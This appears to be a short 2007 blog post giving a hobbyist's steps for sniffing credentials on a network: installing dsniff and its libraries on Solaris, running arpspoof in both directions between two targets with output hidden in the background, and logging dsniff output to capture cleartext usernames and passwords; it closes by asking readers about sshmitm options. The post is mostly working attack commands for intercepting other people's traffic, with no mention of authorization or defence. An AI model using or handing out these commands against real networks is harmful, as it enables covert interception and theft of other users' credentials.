this is just a simple and lame instruction on how to start sniffing the network
1st thing to do is to make sure that you have the following:
1)openssl pkg-get install openssl
2)libgcc pkg-get install libgcc
3)gcc pkg-get install gcc
4)libnet pkg-get install libnet
5)libnids pkg-get install libnids
6)libpcap pkg-get install
7)berkeley DB just pkg-get install db
all of them are from sunfreeware.com
then after you have completed the following it's time to *sniff*sniff*
pkg-get install dsniff
chec the installation directory of your dsniff.Mine is at /usr/local/sbin
start th arpspoofing
./arpspoof -t targetA targetB 2>/dev/null 1>/dev/null &
./arpspoof -t targetB targetA 2>/dev/null 1>/dev/null &
the function of 2>/dev/null 1>/dev/null & is to make the process output in /dev/null and not at the console which is very irritating actually unless you want to see it;P
then just start ./dsniff >sniffeddata
Ive tried ./dsniff -w sniffdata to output the data to a file but unfortunately my sniffer sees nothing from the network
then just wait for 1 day..and there will be some clear text password and user what will be sniffed
I'm still working on the sshmitm and webmitm...still don't understand the manual..the author didn't give any info:(
Version: 2.4
Usage: sshmitm [-d] [-I] [-p port] host [port]<--what is d and what is I?
if anybody know this..can u put it in the comment
Wednesday, April 4, 2007
Subscribe to:
Post Comments (Atom)

No comments:
Post a Comment